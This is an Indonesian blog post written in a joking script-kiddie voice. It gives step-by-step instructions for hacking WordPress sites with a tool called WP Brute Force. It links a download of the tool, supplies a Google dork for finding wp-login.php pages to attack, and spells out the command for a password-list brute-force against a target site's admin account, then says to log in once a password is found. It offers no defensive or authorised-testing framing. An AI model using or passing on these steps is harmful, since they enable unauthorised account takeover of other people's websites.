Wednesday, August 5, 2015

Hack Site dengan Wp Brute Force

Wiiih Wiiih Keren banget nih nama Software, WP Brute Force.
Halo gan ketemu lagi nih ama ane, nih ane kemarin coba cari cara hack suatu situs dengan cara mudah tapi ga keliatan mudah.
Nah Loh, maksudnya apa nih Admin Nyenyek Onta? Gini loh gan, kemarin ane nonton film Sugoi banget, namanya Who Am I - No system is safe. Nah abis nonton tuh film jiwa ane serasa berkobar untuk jadi hacker minimal script kiddie laaah....
karena mempelajari bahasa pemrograman untuk sekedar nge - hack  suatu website sangat sulit dan lama lagian banyak biaya makanya ane cari jalan alternatifnya.


Voila ketemulah yang namanya Wp Brute Force, aplikasi ini keren karena tampilannya pake Command Prompt jadi keliatan susah gitu ngehack suatu website kalau diliat sekilas.
padahal pemakaian Software ini lebih gampang daripada bikin meme di paint atau ngorek kuping pake jempol kaki.

Muantep buanget toh Softwarenya tampilannya

Sorry gan, itu bukan Screen Shot dari Pc ane tapi dari Pc Warnet. Laptop ane ilang :(

Okelah, langsung aja kita coba yaaa...
  • Download Aplikasinya Link Download Brute Force (Password if needed: http://indocyberarmy.blogspot.com)
  • Kalo udah di download langsung exstrak filenya dengan alamat C://WpBruteforce
  • Sekarang buka cmd
  • ketik cd.. sampai nanti tinggal tersisa tulisan C:// di cmd
  • lalu ketikkan Direktorinya dengan cara cd WpBruteforce
  • maka akan muncul tulisan C://Wpbruteforce>
  • Ketikkan WPBforce.exe
  • maka akan muncul tampilan seperti screenshoot diatas.
  • Pakai Dork : inurl:/wp-login.php (Bisa dikembangkan lagi, kalau bisa share sekalian gan di Comment)
  • setelah menemukan target yang pas langsung aja serang.
  • caranya: ketik WPBforce.exe -url=http://situsyangentemauhajar.com -user=admin -pass=pwd_lista.txt -threads=10
  • Setelah itu Enter
  • Berdoa aja situsnya masih vuln buat diserang, kalo berhasil maka akan muncul password ama usernamenya.
  • Trus ente tinggal Login.

Sekian
Share:

0 komentar:

Post a Comment